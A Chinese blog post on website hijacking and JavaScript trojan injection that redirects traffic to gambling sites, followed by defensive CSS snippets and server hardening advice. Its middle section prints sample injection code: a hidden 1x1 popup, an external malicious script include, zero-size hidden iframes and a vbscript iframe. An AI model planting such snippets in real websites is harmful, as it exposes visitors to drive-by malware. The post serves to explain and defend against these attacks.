喜歡的朋友可以關注下。
相信很多的朋友都有遇見過,通過百度快照訪問一個網站被跳轉到另一個目標網站。
這就說明網站被劫持了,那么黑客為什么要劫持這些網站呢?黑客一般選擇什么樣的網站下手?下面我們就一起分析一下。
首先黑客一般都會選擇信息類網站,購物網站等,因為這些網站的IP高,劫持這些網站能達到他們的引流目的。我們這來做一個假設,如果有100個用戶准備訪問A網站,但都被劫持到B網站了,那么只是會有10%的用戶會對B網站產生興趣,那么他們的引流目的就達到了,對於A網站而言,他們就損失了部分用戶,這是他們不願看見的,所以他們是很痛恨黑客的。
當然被黑客劫持的網站往往他們都會引流到一些菠菜類的網站,相信很多人看了都會有去搏一搏的心態,一玩不要緊,如果你的控制能力很差的話,那么你就深深的陷入了,這是一個吃人不吐骨頭的,這里還是溫馨的提醒大家 不要有賭博的心態,不說題外話了,下面我們就一起來看看所謂的木馬。
首先,我們需要弄清楚黑客一般是通過哪些渠道來給網站掛木馬的。
1.通過漏洞(例如一個軟件的漏里,給你的服務器上傳一些命令腳本)
2.破解你的服務器賬號密碼,創建子用戶,任意上傳腳本文件
這里我來例舉一些常見的木馬腳本命令:
現在最多見的JS掛馬方法有兩種,一種是直接將JavaScript腳本代碼寫在網頁中,當訪問者在瀏覽網頁時,惡意的掛馬腳本就會通過用戶的瀏覽器悄悄地打開網馬窗口,隱藏地運行。
這種方法使用的關鍵代碼如下:
window.open("http://www.mahaixiang.cn/木馬.html","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1");
這種代碼往往很長,很容易被安全工程師發現,而且沒有經驗的黑客也喜歡將“width”和“height”參數設為“0”,但是設置為0后,可能會出現惡意代碼不運行的情況。
另外一種JS掛馬方式是,黑客先將掛馬腳本代碼“document.write('<Iframe src="網頁木馬地址" ></iframe>')”,寫入Windows中的寫字板另存為后綴為.js的腳本文件,並上傳到自己指定的網址。這時黑客只需要在受害者 的網站中寫入:
<script src="http://www.mahaixiang.cn/木馬腳本.js"></script>
或者
document.write("<div style='display:none'>")
document.write("<iframe src="網頁木馬地址" width="0" height="0" scrolling="no" frameborder="0"></iframe>")
document.write("</div>")
還有這種方式
<iframe src="vbscript:[掛馬腳本]">
這個圖大家都能看明白,這就黑客的攻擊流程。
其次,當我們發現自己的網站被掛馬了,改如何來做呢?
當你的網站文件不是很多時,那么你可以一個一個來查看,看見陌生的代碼,這時你就需要注意了,有可能就是木馬了。
那么如果你的文件有成千上萬個,自己一個一個的看那不是要看到眼花,這里我給大家推薦一款免費的查找工具護衛神,下面我把工具分享給大家需要可以下載
https://download.csdn.net/download/dsn727455218/10592371
這里面,是有三款軟件,其一就是木馬查找工具,已經防篡改工具,及防攻擊的
上面介紹的是用工具來防止被掛馬,那么我們通過代碼來如何實現呢,一起來看看
防第一種JS掛馬方式,不方便,用得非常少,而第二種JS掛馬方式才是當前主流的,所以我們主要針對它進行防御。方法就是阻止Src請求的異地外域的JS腳本,代碼如下:
iframe{mdy1:expression(this.src='about:blank',this.outerHTML='');}
script{mzm2:expression((this.src.toLowerCase().indexOf('http')==0)?document.write('木馬被成功隔離!'):'');}
不過這種方法的缺點就是網站的訪問者將不能看到被掛了JS木馬的相關網頁。
所以我們為安全工程師提供了一段可以中止JS腳本運行的CSS代碼,這段代碼會讓異地外域的JS文件在使用document.write()時,被 document.close()強制關閉。這個時侯JS掛馬的內容往往還沒有來得及寫完,只有部分被強制輸出了,Writer后面的內容再不會被寫入訪 問者的電腦中,從而起到防范JS腳本掛馬的作用。
讓JS木馬的進程迅速中止
在 <head> </head> 之間加入如下代碼:
屏蔽script和iframe
<style type="text/css" id="LinrStudio"> /*<![CDATA[*/ iframe{nhk1:expression(this.src='about:blank',this.outerHTML='');} script{ngz1:expression((this.src.indexOf('http')==0)?document.close():''); /*]]>*/ </style>
單屏蔽script
<style type="text/css" id="LinrStudio"> /*<![CDATA[*/ /*iframe{nhk1:expression(this.src='about:blank',this.outerHTML='');}*/ script{ngz1:expression((this.src.indexOf('http')==0)?document.close():'');} /*]]>*/ </style>
通過添加一個代碼來防止被被人掛馬。
下面我就給大家分享一下如何做好服務器安全工作:
1.對項目文件增加讀寫權限
2.服務器的密碼不要用什么root,admin,123456這些很容易被試出來的,相信很多人都是用這個密碼吧。
3.服務器限制IP登錄,一般登錄服務器基本上都是那么兩個人可以設置白名單,其他的一律禁止登錄
4.不定期的維護等
5.當然如果你們公司有錢,也可買付費產品,他們能防止的很多,我看阿里雲的安騎士專業版一年的費用都是好幾千,還不算其他的一些產品,相信很多的小公司,都不願出這個錢,所以大家還是努力做好自己的防護措施。
如有需要可以加我Q群【308742428】大家一起討論技術。
后面會不定時為大家更新文章,敬請期待。
喜歡的朋友可以關注下。
如果對你有幫助,請打賞一下!!!
